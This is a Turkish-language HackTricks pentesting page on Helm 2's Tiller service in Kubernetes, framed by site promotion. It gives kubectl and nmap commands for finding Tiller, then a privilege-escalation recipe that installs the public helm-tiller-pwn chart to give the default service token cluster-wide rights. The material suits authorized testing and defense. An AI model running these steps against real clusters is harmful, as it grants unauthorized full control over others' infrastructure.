5.2 KiB
AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenmek için htARTE (HackTricks AWS Kırmızı Takım Uzmanı)'a katılın!
HackTricks'ı desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek için ABONELİK PLANLARINI kontrol edin!
- Resmi PEASS & HackTricks ürünlerini edinin
- Özel NFT'lerden oluşan koleksiyonumuz The PEASS Family'i keşfedin
- 💬 Discord grubuna veya telegram grubuna katılın veya Twitter 🐦 @carlospolopm'u takip edin.
- Hacking hilelerinizi HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.
Temel Bilgiler
Helm, Kubernetes için bir paket yöneticisidir. YAML dosyalarını paketleyip bunları genel ve özel depolarda dağıtmaya olanak sağlar. Bu paketlere Helm Charts denir. Tiller, varsayılan olarak 44134 portunda çalışan bir hizmettir.
PORT STATE SERVICE VERSION
44134/tcp open unknown
Numaralandırma
Farklı ad alanlarının kapsayıcıları ve/veya hizmetleri numaralandırabiliyorsanız, onları numaralandırın ve isimlerinde "tiller" geçenleri arayın:
kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
kubectl get pods -n kube-system | grep -i "tiller"
kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"
Örnekler:
kubectl get pods -n kube-system
NAME READY STATUS RESTARTS AGE
kube-scheduler-controlplane 1/1 Running 0 35m
tiller-deploy-56b574c76d-l265z 1/1 Running 0 35m
kubectl get services -n kube-system
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kube-dns ClusterIP 10.96.0.10 <none> 53/UDP,53/TCP,9153/TCP 35m
tiller-deploy ClusterIP 10.98.57.159 <none> 44134/TCP 35m
Bu hizmeti çalışırken bulmak için 44134 portunu kontrol etmeyi deneyebilirsiniz:
sudo nmap -sS -p 44134 <IP>
Bulduktan sonra, istemci helm uygulamasını indirerek onunla iletişim kurabilirsiniz. homebrew
gibi araçları kullanabilir veya resmi sürümler sayfasına bakabilirsiniz. Daha fazla ayrıntı veya diğer seçenekler için kurulum kılavuzuna bakın.
Ardından, hizmeti numaralandırabilirsiniz:
helm --host tiller-deploy.kube-system:44134 version
Ayrıcalık Yükseltme
Varsayılan olarak Helm2, kube-system ad alanında yüksek ayrıcalıklarla kurulmuştur, bu yüzden servisi bulursanız ve erişiminiz varsa, bu size ayrıcalıkları yükseltme imkanı sağlayabilir.
Yapmanız gereken tek şey, şu gibi bir paket kurmaktır: https://github.com/Ruil1n/helm-tiller-pwn, bu paket varsayılan servis jetonuna tüm kümedeki her şeye erişim sağlar.
git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
/pwnchart
http://rui0.cn/archives/1573 adresinde saldırının açıklamasını bulabilirsiniz, ancak temel olarak helm-tiller-pwn/pwnchart/templates/ içindeki clusterrole.yaml ve clusterrolebinding.yaml dosyalarını okursanız, tüm yetkilerin varsayılan belirteçe verildiğini görebilirsiniz.
htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahraman olmak için AWS hackleme öğrenin!
HackTricks'i desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek için ABONELİK PLANLARINI kontrol edin!
- Resmi PEASS & HackTricks ürünlerini edinin
- Özel NFT'lerden oluşan koleksiyonumuz The PEASS Family'i keşfedin
- 💬 Discord grubuna veya telegram grubuna katılın veya bizi Twitter 🐦 @carlospolopm'da takip edin.
- Hacking hilelerinizi HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.